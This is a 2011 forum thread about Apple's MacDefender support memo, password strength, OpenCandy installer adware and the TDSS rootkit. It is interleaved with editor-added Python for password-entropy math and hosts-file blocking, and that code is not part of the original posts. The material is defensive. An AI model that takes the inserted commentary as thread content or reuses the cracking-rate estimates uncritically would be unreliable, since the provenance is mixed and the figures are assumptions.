    • Do not attempt to remove or uninstall any malware software.

    • Do not send any escalations or contact Tier 2 for support about removing the software, or provide impact data.

    • Do not refer customers to the Apple Retail Store. The ARS does not provide any additional support for malware.

    TetraNitroCubane on
    RBach Registered User regular
    edited May 2011
    Look at it this way: While this particular bit of malware is easy to remove, some variant of it (or an entirely new virus/worm/whatever) that comes out later on may not be, and average end users don't understand that sort of distinction. Second, if AppleCare were to help remove it and the customer installed it again later on they would call in for help removing it again or call in angry that Apple didn't really remove it the first time. Then suppose MacDefender has then changed again and become harder to remove. At that point they're probably going to need an antivirus, anyway, so might as well just get one first thing and be done with it.

    There's no reason to go to Tier 2 because there's nothing more to do: regular ol' tech support can suggest a few antivirus programs as easily as Tier 2 could, and contacting them is just wasting everyone's time. Likewise, the stores can't do anything for the same reasons AppleCare can't/doesn't. One thing that does baffle me, though, is the "do not confirm/deny" point. It's kind of obvious once you've installed MacDefender, after all...

    Once again, this isn't anything new. Call up Microsoft sometime and ask them how to remove malware. They'll tell you the same thing: get an antivirus. Why Apple is singled out for this behavior is beyond me.

    That said, I hope Apple updates the built in quasi-AV in Snow Leopard to take care of this thing. There's a precedent for it. And nothing it covers has gotten nearly as much press or spread as far as MacDefender has.

    RBach on
    TetraNitroCubane The Djinnerator At the bottom of a bottle Registered User regular
    edited May 2011
    That's a very good point, and I can understand the logic behind not wanting to get involved. But there are a few things that I want to bring up before letting the issue rest.

    First, the memo is unclear as to whether or not Apple will actually recommend installing antivirus. They do indicate telling afflicted users to visit the Apple Store, but they're also instructed specifically not to indicate that a problem exists (that first bullet point). Microsoft has a policy for security issues, quoted in that linked article above:
    ZDNet wrote:
    Microsoft provides free telephone support for security issues to all customers, regardless of whether the software was purchased at retail or as part of a new PC. Microsoft Support Article 129972 (last updated May 17, 2011) contains these instructions:

    How to obtain computer virus and security-related support - For United States and Canada

    The computer safety team is available for computer virus and for other security-related support 24 hours a day in the United States and in Canada.
    To obtain computer virus and security-related support, follow these steps:
    Before you contact a support engineer, make sure that you run updated antivirus software and updated spyware removal software on the infected computer.
    For more information about how to obtain a free computer safety scan, visit the following Microsoft Web site: http://www.microsoft.com/security/scanner/
    For more information about antispyware software, visit the following Microsoft Web site: http://www.microsoft.com/protect/computer/spyware/as.mspx
    Call 1-866-PCSAFETY or call 1-866-727-2338 to contact security support.

    The spoilered portion of that quote has recommendations and instructions to install and run antivirus before contacting support. The KB article from Microsoft in that quote also has a fairly nice rundown of what viruses, spyware, and malware are, as well as a section specifically detailing the steps necessary to remove rogues and reset your proxy settings in case malware trashed them. Microsoft also releases, every month, a malicious software removal tool that installs via automatic updates, and they provide a competitive antivirus solution for free.

    Will their recommendation be 'Install an antivirus' if you call them up? Probably so, if you haven't already, but the information provided seems to indicate they'll also go through the pains to help you clear the infection. They'll certainly acknowledge the infection is a problem. They have a 24 hour support line specifically for this issue, and recommend that you install antivirus before calling it, so I'd assume they'll help you through to the end. This seems to contrast the Apple mentality. To be fair, history has necessitated this on the Microsoft end of things.

    Second, don't get me started about that quasi-AV for Snow Leopard. It's a joke, plain and simple - unless, as you say, they update it at some point. It was lip service paid to the consumer at the launch of Snow Leopard to combat the two trojans in the wild at the time, and I assume that it became utterly useless within a week of Snow Leopard's release when the trojans were altered as they always are.

    The reason I'm heaping on Apple here is because these attitudes just feed into the negative problems that are causing the issue to begin with. By refusing to acknowledge that a problem exists, they continue to perpetuate the image that nothing can go wrong with OS X. The reason people are falling for this MacDefender stuff is poor knowledge, which makes them a ripe social engineering target. If Apple were to be a bit more forthright about this, they could dampen the impact considerably.

    I'm not trying to start a vicious argument here, so forgive me if I come off a bit snippy. OS X remains more secure than Windows in light of the current threat landscape, and I'm not trying to contest that fact. I also agree that there are some good reasons not to want to have call centers flooded with this issue, and that there's not much to be done on the tech's end of things. The official Apple word could just be a bit more sensitive to the customer who's plagued by this, and the 'head in the sand' approach to verifying the problem just sort of gets under my skin. Security starts with the user, and educating the user is more valuable than taking a silent approach.

    Edit: Gadzooks, I talk too much. Apologies for piling on again.

    TetraNitroCubane on
    AnteCantelope Registered User regular
    edited May 2011
    Would a 40 digit number be a good password? I know that mixing characters, numbers, and special characters makes a stronger password, but if you've got 40 digits would that be strong enough? Maybe if I chuck a couple of letters in there somewhere too, like putting a word in the middle of it...

    AnteCantelope on
    Synthesis Honda Today! Registered User regular
    edited May 2011
    RBach wrote: »
    yotes wrote: »

    Because if I were to call up Microsoft for help with a malware infection they'd be so helpful, too. Oh, wait, no, they'll just suggest getting an antivirus. Which is exactly what Apple is doing (and should do).

    If they'd suggest getting MSE, you'd already be one step ahead from it.

    I've called, of all people, Zune tech support, and once they thought a problem I had might have been due to something that could be corrected by Malwarebytes. Yup, the one. I already had it, so that was a dead end. But I was a bit impressed that they'd suggest it. It was more than a year ago, perhaps, but they basically sent me a link to somewhere they'd hosted the client installer.

    Synthesis on
    TetraNitroCubane The Djinnerator At the bottom of a bottle Registered User regular
    edited May 2011
    Would a 40 digit number be a good password? I know that mixing characters, numbers, and special characters makes a stronger password, but if you've got 40 digits would that be strong enough? Maybe if I chuck a couple of letters in there somewhere too, like putting a word in the middle of it...

    A 40 digit number would be weaker than the corresponding length password containing characters and symbols, but to be honest I'm not sure how the security would stack up against attacks. Realistically, though, I think it'd be a larger question of practicality rather than security. First, you're going to need to know if the service/software you're using the password for is going to (A) accept only numeric digits (many require alphanumeric at least, if not demanding special characters, too), and (B) have limits on password length.

    Overall, anything that's going to let you use 40 digits in a row would probably also allow you to use a passphrase, instead of a password. And it'd probably be easier to remember a passphrase with some numbers sprinkled in, rather than a password that's 40 digits long with a word in there somewhere.

    I'm no cryptography expert, so that's just my $0.02. I know we've got some other, more skilled people on the board who can provide a more detailed answer than I can, though!

    TetraNitroCubane on
    Orca Also known as Espressosaurus Wrex Registered User regular
    edited May 2011
    Well, the first problem you'll run into is a lot of places won't let you use a 40 character password. Which is stupid, because a phrase is easier to remember than 15 characters of garbage. But that's how people tend to set up password systems. What's worse though is that it isn't always obvious that your password is too long and it's just been truncated--so you think you're good, but you're not. And then there are the password complexity rules TetraNitroCubane correctly points out.

    Second, you're looking at 10^40 possible passwords by using just 40 digits. Very good, actually. Much better than most passwords unless they're getting to an obscene length. A password with a mix of numbers, mixed case letters, and symbols needs 20-21 characters to get similar complexity, which is already beyond what most people will memorize. Your not-so-average 10 character password with letters, numbers, and symbols is only looking at 10^19 possible passwords; 21 orders of magnitude less.

    So if you can remember that sort of monolithic password, and if you only use it for one thing (avoid password reuse if you can), and if the place you want to use it in allows it, yeah, it's a good idea.

    Orca on
    AnteCantelope Registered User regular
    edited May 2011
    Cool, thanks. The number's engraved in my mind after I needed it for something else a few years ago, I don't need it any more but thought I could put it to good use. I know 10^40 is less combinations than a mix of all other characters, but would a hacker be able to see that I only had numbers? Wouldn't it, to them, still seem like 50^40 combinations (I'm guessing at the number of special characters)?

    AnteCantelope on
    Orca Also known as Espressosaurus Wrex Registered User regular
    edited May 2011
    A hacker wouldn't know unless the site you're using it for is doing something stupid with their security, in which case you're boned anyway. So as far as they're concerned it could be anything.

    And it's better than 50^40 (assuming all normal ascii characters); it's (32+(26*2)+10)^password length. But as you can see, very long lengths will still get the job done...you just need more characters.

    Orca on
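The arithmetic in the two Orca posts above, carried through as an added example (this is editor-supplied code, not something anyone in the thread posted). The character-set sizes are the ones Orca uses (10 digits, 62 alphanumerics, 94 printable ASCII characters excluding space); the guess rate used for the time estimate and the sample "password" are assumptions and are marked as such in the code. It also covers the two practitioner caveats raised in the thread: what a silent truncation does to the numbers, and how much the search space shrinks if an attacker can tell the password is digits only.

```python
import math

# Character-set sizes used in the thread's arithmetic: digits only,
# letters+digits, and printable ASCII minus the space character
# (32 symbols + 52 letters + 10 digits = 94).
DIGITS = 10
ALPHANUMERIC = 62
PRINTABLE_ASCII = 94

# Assumed attacker throughput for the time estimate (offline hash
# cracking on commodity GPUs is in this region for fast hashes; it is
# an assumption, not a figure from the thread).
ASSUMED_GUESSES_PER_SECOND = 1e10
SECONDS_PER_YEAR = 365.25 * 24 * 3600


def search_space(charset_size, length):
    """Number of candidate passwords of exactly this length and charset."""
    return charset_size ** length


def entropy_bits(charset_size, length):
    """The same quantity in bits: log2 of the search space."""
    return length * math.log2(charset_size)


def equivalent_length(target_space, charset_size):
    """Shortest password over charset_size that is at least as hard to
    brute-force as target_space (the "20-21 characters" comparison)."""
    return math.ceil(math.log(target_space) / math.log(charset_size))


def years_to_exhaust(space, guesses_per_second=ASSUMED_GUESSES_PER_SECOND):
    """Worst-case years to enumerate the whole space at the given rate."""
    return space / guesses_per_second / SECONDS_PER_YEAR


def effective_bits_after_truncation(password, charset_size, max_length=None):
    """Entropy that survives if the site silently keeps only the first
    max_length characters (the truncation problem Orca describes)."""
    kept = len(password) if max_length is None else min(len(password), max_length)
    return entropy_bits(charset_size, kept)


def space_if_composition_known(password):
    """Search space an attacker faces if they learn which character
    classes were used (e.g. the site stored or logged the password badly).
    A digits-only password collapses to 10**len, which is exactly the
    10**40 figure from the thread; a mixed one stays at 94**len."""
    size = 0
    if any(c.isdigit() for c in password):
        size += 10
    if any(c.islower() for c in password):
        size += 26
    if any(c.isupper() for c in password):
        size += 26
    if any(not c.isalnum() for c in password):
        size += PRINTABLE_ASCII - ALPHANUMERIC   # the 32 symbols
    return size ** len(password)


if __name__ == "__main__":
    forty_digits = "1" * 40   # constructed stand-in, not a real password
    space40 = search_space(DIGITS, 40)
    print(f"40 digits: {entropy_bits(DIGITS, 40):.1f} bits, "
          f"{years_to_exhaust(space40):.2e} years to exhaust")
    print("printable-ASCII length needed to match it:",
          equivalent_length(space40, PRINTABLE_ASCII))
    print("alphanumeric length needed to match it:",
          equivalent_length(space40, ALPHANUMERIC))
    print("10 chars of printable ASCII: "
          f"10^{math.log10(search_space(PRINTABLE_ASCII, 10)):.1f}")
    print("same 40 digits silently truncated to 16: "
          f"{effective_bits_after_truncation(forty_digits, DIGITS, 16):.1f} bits")
    print("if the attacker knows it is digits only: "
          f"10^{math.log10(space_if_composition_known(forty_digits)):.0f}")
```

The numbers line up with the thread: 10^40 is about 133 bits, a printable-ASCII password needs 21 characters to match it, and 94^10 is a little under 10^20. The truncation function is the one to take seriously: a 40-digit secret silently cut to 16 characters by a badly written login form is worth about 53 bits, which is well inside offline cracking range for a fast unsalted hash. The composition function models the case Orca calls "doing something stupid with their security": an attacker who has learned the password is digits only will run a digits-only mask rather than the full 94-character space, so the honest figure for a digits-only password is 10^n, not 94^n, even though 10^40 is still far out of reach.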
    TetraNitroCubane The Djinnerator At the bottom of a bottle Registered User regular
    edited May 2011
    Longwinded story time!

    I've recently had a run in with OpenCandy. For those of you not familiar with OpenCandy, it's essentially a program that is embedded in a variety of popular free downloads. Once you launch the installer, OpenCandy does a scan of your computer, collecting data about your installed programs. Then it displays advertisements in the installer, offering to install other programs at the same time. You have the ability to reject or accept.

    The security world has gone back and forth, and back again about the classification of OpenCandy. Some call it spyware, but OpenCandy defends itself as being harmless and completely optional. To my chagrin, I believe that ESET had been tolerating OpenCandy for a long while. They changed their mind recently, and an old copy of Driver Sweeper I had on my hard drive (That's been sitting there for over a year) suddenly came up in past weeks as being malicious - giving my heart a stop until I examined the 'threat' in more detail. ESET have since then gone back on their decision, and OpenCandy is no longer detected by them, which is odd. It played havoc with my backups at the time, and nearly gave me a heart attack.

    There's an interesting analysis of OpenCandy on this page. The most pertinent points are:
    Harmless Advertising or a New Form of Spyware

    Now to some readers all this may sound harmless enough but there is more to it:
    • The recommendations made by OC are partly based on the products you already have installed on your PC. OpenCandy determines this by secretly scanning your PC without ever asking your permission.

    • While you can elect not to download any of the programs suggested by OC you cannot opt out from installing OC itself; it is fully embedded in the installation process. The situation is made worse by the fact that some software vendors don’t even mention in their End User Licensing Agreement (EULA) that OC is included as part of the installation process for their product.

    • If you accept any of the software recommendations made by OC then not only will that software be downloaded and installed but OC will also permanently install itself on your PC as well.
    • Regardless of whether you accept or reject OC’s software recommendations OC will transmit information about your PC back to the OpenCandy Corporation.

    • Some anti-malware programs including Microsoft Security Essentials flag some products containing OpenCandy as adware.

    The makers of OpenCandy have published some credible counter-arguments. They claim:
    • Many installers from reputable companies scan your PC during the installation process to check for old versions, the existence of essential components and more.

    • They also claim that OC installs nothing permanently on your computer should you choose not to accept any OC download recommendations.

    • They state that any data about your PC sent back to OC is the kind of general information collected when you visit a website and contains no personally identifiable information.

    Grayware like this is hard to properly classify, and it usually boils down to end-user comfort. For those of you who prefer to keep OpenCandy away from your machine, one thing you can do is to use your HOSTS file to block OpenCandy's call home. To do so, add the following line to your HOSTS file:
    127.0.0.1 api.opencandy.com

    Additionally, for those curious, please find a short list of some of the software utilizing OpenCandy under the spoiler below. Again, some consider it harmless, others do not - It's up to you to make your decision.
    Wikipedia wrote:
    Applications known to use OpenCandy
    • Any Video Converter
    • CDBurnerXP
    • Cheat Engine
    • CutePDF
    • Driver Sweeper (2.9 verified)
    • FL Studio
    • Free Music Zilla 2.0.4 according to terms of use
    • IZArc
    • Kantaris
    • MediaCoder
    • MediaInfo
    • MiPony
    • Orbit Downloader
    • PeaZip
    • PrimoPDF
    • SPlayer
    • SUPER
    • Trillian
    • WinSCP (removed in WinSCP 4.3.2)

    TetraNitroCubane on
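A safe way to apply the HOSTS-file change from the post above, as an added example that is not part of the original post. The only thing taken from the post is the hostname api.opencandy.com and the 127.0.0.1 address; the hosts-file paths, the sample file contents and the function names are assumptions. The point of doing it in code rather than by hand is that it parses the file the way the resolver does (comments ignored, first match wins), so it will not add a duplicate line and will not silently add an entry that an earlier line already shadows.

```python
import sys

# Usual hosts-file location per platform (assumed; adjust if yours differs).
HOSTS_PATH = (r"C:\Windows\System32\drivers\etc\hosts"
              if sys.platform.startswith("win") else "/etc/hosts")

# Constructed sample content for the demo; not a real hosts file.
SAMPLE_HOSTS = """\
127.0.0.1 localhost
::1       localhost
#127.0.0.1 api.opencandy.com   <- commented out, so it is NOT active
"""


def parse_hosts(text):
    """Yield (address, [hostnames]) for every active line, ignoring comments."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop full-line and inline comments
        fields = line.split()
        if len(fields) >= 2:
            yield fields[0], [name.lower() for name in fields[1:]]


def lookup(text, hostname):
    """Address the hosts file maps hostname to, or None if it is not listed.
    First match wins, which is how the resolver treats duplicate entries."""
    hostname = hostname.lower()
    for addr, names in parse_hosts(text):
        if hostname in names:
            return addr
    return None


def add_block_entry(text, hostname, addr="127.0.0.1"):
    """Return (new_text, changed). Idempotent: an existing mapping to addr is
    left alone, and a mapping to some other address raises instead of adding
    a second line that the resolver would never reach."""
    existing = lookup(text, hostname)
    if existing == addr:
        return text, False
    if existing is not None:
        raise ValueError(f"{hostname} already maps to {existing}")
    if text and not text.endswith("\n"):
        text += "\n"
    return text + f"{addr} {hostname}\n", True


def block_in_file(hostname, path=HOSTS_PATH, addr="127.0.0.1"):
    """Apply add_block_entry to the real file. Writing needs admin/root, and
    some AV products alert on hosts-file writes, which is expected here."""
    with open(path, encoding="utf-8") as f:
        new_text, changed = add_block_entry(f.read(), hostname, addr)
    if changed:
        with open(path, "w", encoding="utf-8") as f:
            f.write(new_text)
    return changed


if __name__ == "__main__":
    updated, changed = add_block_entry(SAMPLE_HOSTS, "api.opencandy.com")
    print("changed:", changed)
    print(updated, end="")
    print("api.opencandy.com ->", lookup(updated, "api.opencandy.com"))
    # Second run is a no-op:
    print("changed again:", add_block_entry(updated, "api.opencandy.com")[1])
```

Two caveats worth knowing before relying on this. A hosts entry only intercepts lookups for that exact name: if the installer reaches another hostname or a hard-coded IP, the entry does nothing, and nothing in the post says which of those apply here. And 127.0.0.1 hands the connection to your own loopback interface, where it will succeed if anything local happens to listen on that port; many people use 0.0.0.0 instead so the connection fails immediately. Either is a valid argument to the addr parameter above.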
    khalathas Computer Repair Technician Sarasota, FL Registered User regular
    edited May 2011
    Reboot your system. Once the BIOS POST message clears, mash on F8 until you have the option to load various Windows Safe-Modes. Choose Safe Mode with Networking, and let things load up.

    I just wanted to comment on this one. If you're having weird seemingly-untraceable issues, like no malware detected whatsoever, but webpages and searches being redirected anyway, despite a clean hosts file...you might be a victim of a lil rootkit called TDSS (also known as Alureon). It can hide in your MBR, and it can also hide in various drivers. If it manages to hide in your network driver, it will be undetectable, even by TDSSKiller, as long as the network device is active, so in such a case, safe mode with NO networking is the way to go to scan for this particular nasty.

    http://support.kaspersky.com/viruses/solutions?qid=208280684

    khalathas on
    Orca Also known as Espressosaurus Wrex Registered User regular
    edited May 2011
    That is one nasty little beasty.

    Orca on